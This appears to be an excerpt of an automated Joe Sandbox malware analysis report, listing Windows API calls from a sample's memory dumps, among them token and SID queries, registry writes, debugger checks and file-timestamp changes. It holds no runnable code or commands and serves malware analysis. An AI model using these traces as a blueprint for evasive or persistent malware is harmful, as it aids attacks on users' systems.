      • Part of subcall function 00409240: CloseHandle.KERNEL32(00000000), ref: 004093F9
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00406D9C
    • Sleep.KERNEL32(00001388), ref: 00406DA7
    • TerminateProcess.KERNEL32(00000000), ref: 00406DB4
    • CreateThread.KERNEL32(00000000,00000000,00406C88,?,00000000,00000000), ref: 00406DC6
    • CloseHandle.KERNEL32(00000000), ref: 00406DD3
    • FindAtomW.KERNEL32(?), ref: 00406E00
    • DeleteAtom.KERNEL32(?), ref: 00406E0A
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
      • Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
      • Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
    • GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
      • Part of subcall function 0040DAD5: GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0040DAF2
      • Part of subcall function 0040DAD5: SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0040DBA6
      • Part of subcall function 0040DAD5: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DBAD
      • Part of subcall function 0040DAD5: SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0040DBB6
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
    • SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
    • GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
    • SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
    • CloseHandle.KERNEL32(00000000), ref: 0040DD9C
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
    • HeapFree.KERNEL32(00000000), ref: 0040DDB0
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00435AE2,00000104), ref: 004208C0
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
    • _wcslen.LIBCMT ref: 004208EF
    • _wcslen.LIBCMT ref: 004208FC
      • Part of subcall function 00424851: LoadLibraryW.KERNEL32(00434558), ref: 0042488C
    • GetStdHandle.KERNEL32(000000F4), ref: 00420972
    • _strlen.LIBCMT ref: 004209AF
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004209BE
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000100,00000000,00000000,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425307
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000100,?,00000000,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425375
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425391
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000100,00000000,?,?,?,?,?,?,?), ref: 004253CA
      • Part of subcall function 0042BB4E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE), ref: 0042BB93
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425430
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000100,00000000,?,?,?,?), ref: 0042544F
    • __freea.LIBCMT ref: 00425459
    • __freea.LIBCMT ref: 00425462
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 00422228
    • InterlockedDecrement.KERNEL32(?), ref: 00422235
    • InterlockedDecrement.KERNEL32(?), ref: 00422242
    • InterlockedDecrement.KERNEL32(?), ref: 0042224F
    • InterlockedDecrement.KERNEL32(?), ref: 0042225C
    • InterlockedDecrement.KERNEL32(?), ref: 00422278
    • InterlockedDecrement.KERNEL32(00000000), ref: 00422288
    • InterlockedDecrement.KERNEL32(?), ref: 0042229E
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • InterlockedIncrement.KERNEL32(00000000), ref: 00422191
    • InterlockedIncrement.KERNEL32(?), ref: 0042219E
    • InterlockedIncrement.KERNEL32(?), ref: 004221AB
    • InterlockedIncrement.KERNEL32(?), ref: 004221B8
    • InterlockedIncrement.KERNEL32(?), ref: 004221C5
    • InterlockedIncrement.KERNEL32(?), ref: 004221E1
    • InterlockedIncrement.KERNEL32(?), ref: 004221F1
    • InterlockedIncrement.KERNEL32(?), ref: 00422207
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 00421FD7
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
      • Part of subcall function 00421C80: __getptd.LIBCMT ref: 00421C8C
      • Part of subcall function 00421C80: __amsg_exit.LIBCMT ref: 00421CAC
      • Part of subcall function 00421C80: InterlockedDecrement.KERNEL32(?), ref: 00421CD9
      • Part of subcall function 00421C80: InterlockedIncrement.KERNEL32(00432C08), ref: 00421D04
      • Part of subcall function 00421D24: GetOEMCP.KERNEL32 ref: 00421D4D
      • Part of subcall function 00421D24: GetACP.KERNEL32 ref: 00421D70
      • Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61
    • InterlockedDecrement.KERNEL32(?), ref: 0042203D
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD
    • InterlockedDecrement.KERNEL32 ref: 004220F4
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetCurrentThread.KERNEL32 ref: 0041ED0A
    • GetEnvironmentStrings.KERNEL32 ref: 0041ED12
    • GetVersionExA.KERNEL32(?), ref: 0041ED6E
    • GetEnvironmentStrings.KERNEL32 ref: 0041ED74
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
    • GetProcAddress.KERNEL32(00000000), ref: 0040E6C4
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • _ValidateScopeTableHandlers.LIBCMT ref: 00420201
    • __FindPESection.LIBCMT ref: 0042021B
    • VirtualQuery.KERNEL32(?,8E198577,0000001C,8E198577,?,?,?,?,?,00421800,00435740,000000FE,?,0041F0F1,?), ref: 00420301
    • __FindPESection.LIBCMT ref: 00420350
    • _ValidateScopeTableHandlers.LIBCMT ref: 00420374
      • Part of subcall function 00420040: __FindPESection.LIBCMT ref: 00420083
      • Part of subcall function 00420040: __FindPESection.LIBCMT ref: 004200C1
    • __FindPESection.LIBCMT ref: 0042038E
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • _ValidateScopeTableHandlers.LIBCMT ref: 00420201
    • __FindPESection.LIBCMT ref: 0042021B
    • VirtualQuery.KERNEL32(?,0043278C,0000001C,0043278C,?,?,?,?,?,00421800,00435740,000000FE,?,0041F0F1,?), ref: 00420301
    • __FindPESection.LIBCMT ref: 00420350
    • _ValidateScopeTableHandlers.LIBCMT ref: 00420374
      • Part of subcall function 00420040: __FindPESection.LIBCMT ref: 00420083
      • Part of subcall function 00420040: __FindPESection.LIBCMT ref: 004200C1
    • __FindPESection.LIBCMT ref: 0042038E
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • WSAStartup.WS2_32(00000201,?), ref: 00403419
      • Part of subcall function 00404521: GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040453A
      • Part of subcall function 00404521: GetCurrentProcess.KERNEL32(00000008,004019F5,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404546
      • Part of subcall function 00404521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040454D
      • Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 00404570
      • Part of subcall function 00404521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404572
      • Part of subcall function 00404521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404587
      • Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 004045A7
      • Part of subcall function 00404521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 004045B7
      • Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00404601
      • Part of subcall function 00404521: HeapAlloc.KERNEL32(00000000), ref: 00404608
      • Part of subcall function 00404521: GetCapture.USER32 ref: 00404617
      • Part of subcall function 00404521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00404647
      • Part of subcall function 00404521: LocalFree.KERNEL32(76AD46E9), ref: 0040465B
      • Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404664
      • Part of subcall function 00404521: HeapFree.KERNEL32(00000000), ref: 0040466B
      • Part of subcall function 00404521: GlobalFree.KERNEL32(00000000), ref: 00404675
      • Part of subcall function 00404521: CloseHandle.KERNEL32(004019F5), ref: 0040467F
    • SetEvent.KERNEL32 ref: 00403443
    • ExitThread.KERNEL32 ref: 0040344B
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000208,0041CAA8), ref: 00403E3F
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403E42
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00403ED2
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403ED9
      • Part of subcall function 00403E17: GetTickCount.KERNEL32 ref: 00403EED
      • Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403F24
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403F6E
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403F71
      • Part of subcall function 00403E17: GetCaretBlinkTime.USER32 ref: 00403F86
      • Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403FC8
      • Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0040401D
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0040402C
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040402F
      • Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00404051
      • Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 00404077
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00404099
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040409C
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 004040AE
      • Part of subcall function 00403E17: HeapReAlloc.KERNEL32(00000000), ref: 004040B1
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004040D5
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040D8
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 004040E4
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040ED
      • Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 004040FC
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00404107
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 0040410A
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00404112
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 00404115
    • SetEvent.KERNEL32 ref: 00403486
      • Part of subcall function 00403199: GetProcessHeap.KERNEL32(00000008,00000029), ref: 00403209
      • Part of subcall function 00403199: HeapAlloc.KERNEL32(00000000), ref: 00403210
      • Part of subcall function 00403199: GetCapture.USER32 ref: 0040321F
      • Part of subcall function 00403199: Sleep.KERNEL32(-0000EA60), ref: 004032C2
      • Part of subcall function 00403199: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004032E9
      • Part of subcall function 00403199: HeapFree.KERNEL32(00000000), ref: 004032F0
    • Sleep.KERNEL32(-0000EA60), ref: 00403534
      • Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0040BA29
      • Part of subcall function 0040B9E6: HeapAlloc.KERNEL32(00000000), ref: 0040BA2C
      • Part of subcall function 0040B9E6: GetShellWindow.USER32 ref: 0040BA40
      • Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040BA9F
      • Part of subcall function 0040B9E6: HeapAlloc.KERNEL32(00000000), ref: 0040BAA2
      • Part of subcall function 0040B9E6: GetMessageTime.USER32 ref: 0040BAB6
      • Part of subcall function 0040B9E6: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040BAE7
      • Part of subcall function 0040B9E6: GetProcAddress.KERNEL32(00000000), ref: 0040BAEE
      • Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BB23
      • Part of subcall function 0040B9E6: HeapFree.KERNEL32(00000000), ref: 0040BB2C
      • Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000000,?), ref: 0040BB31
      • Part of subcall function 0040B9E6: HeapFree.KERNEL32(00000000), ref: 0040BB34
      • Part of subcall function 00402915: Sleep.KERNEL32(00002710,?,00000000,?,?), ref: 00402938
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00403B01
      • Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403B04
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00403BC8
      • Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403BCB
      • Part of subcall function 00403ADC: GetTickCount.KERNEL32 ref: 00403BDF
      • Part of subcall function 00403ADC: wsprintfW.USER32 ref: 00403C16
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403C56
      • Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403C59
      • Part of subcall function 00403ADC: GetCaretBlinkTime.USER32 ref: 00403C6D
      • Part of subcall function 00403ADC: wsprintfW.USER32 ref: 00403CB2
      • Part of subcall function 00403ADC: RegDeleteValueW.ADVAPI32(?,?), ref: 00403CC5
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403CD4
      • Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403CD7
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403D22
      • Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403D25
      • Part of subcall function 00403ADC: GetCaretBlinkTime.USER32 ref: 00403D39
      • Part of subcall function 00403ADC: wsprintfW.USER32 ref: 00403D7E
      • Part of subcall function 00403ADC: RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00403DAE
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403DC6
      • Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403DC9
      • Part of subcall function 00403ADC: RegCloseKey.ADVAPI32(?), ref: 00403DEA
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,?), ref: 00403DF5
      • Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403DF8
      • Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00403E04
      • Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403E07
      • Part of subcall function 00403300: lstrcpyA.KERNEL32(00000000,?), ref: 004033A1
      • Part of subcall function 00403300: lstrcpyA.KERNEL32(-00000020,00412000), ref: 004033AD
      • Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
      • Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C
    • SetEvent.KERNEL32 ref: 0040350D
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,004077F1,00000000,?), ref: 004086D1
      • Part of subcall function 004086AF: HeapAlloc.KERNEL32(00000000), ref: 004086D8
      • Part of subcall function 004086AF: GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 004086EC
      • Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040870B
      • Part of subcall function 004086AF: HeapFree.KERNEL32(00000000), ref: 0040870E
      • Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040871A
      • Part of subcall function 004086AF: HeapAlloc.KERNEL32(00000000), ref: 0040871D
      • Part of subcall function 004086AF: GetLastError.KERNEL32 ref: 0040873B
      • Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408746
      • Part of subcall function 004086AF: HeapFree.KERNEL32(00000000), ref: 0040874D
      • Part of subcall function 00401B2B: lstrcmpA.KERNEL32(?,?), ref: 00401B77
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00407861
    • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00408D00), ref: 00407876
    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0040788E
    • CloseHandle.KERNEL32(00000000), ref: 004078A7
      • Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 004076D7
      • Part of subcall function 0040765B: HeapAlloc.KERNEL32(00000000), ref: 004076DA
      • Part of subcall function 0040765B: GetProcessHeap.KERNEL32 ref: 004076EF
      • Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040773B
      • Part of subcall function 0040765B: HeapAlloc.KERNEL32(00000000), ref: 0040773E
      • Part of subcall function 0040765B: IsSystemResumeAutomatic.KERNEL32 ref: 00407752
      • Part of subcall function 0040765B: GetModuleHandleA.KERNEL32(00000000,?), ref: 00407783
      • Part of subcall function 0040765B: GetProcAddress.KERNEL32(00000000), ref: 0040778A
      • Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040779E
      • Part of subcall function 0040765B: HeapFree.KERNEL32(00000000), ref: 004077A7
      • Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000000,?), ref: 004077AC
      • Part of subcall function 0040765B: HeapFree.KERNEL32(00000000), ref: 004077AF
    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00408D00), ref: 004078C0
    • HeapFree.KERNEL32(00000000), ref: 004078C7
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0040E625
    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0040E634
    • HeapAlloc.KERNEL32(00000000), ref: 0040E63B
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0040E654
      • Part of subcall function 0040E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0040E667), ref: 0040E55F
      • Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0040E667), ref: 0040E58D
      • Part of subcall function 0040E545: HeapAlloc.KERNEL32(00000000,?,0040E667), ref: 0040E594
      • Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0040E667), ref: 0040E5E9
      • Part of subcall function 0040E545: HeapFree.KERNEL32(00000000,?,0040E667), ref: 0040E5F0
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E66D
    • HeapFree.KERNEL32(00000000), ref: 0040E674
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
    • GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
    • HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
    • ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
    • GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
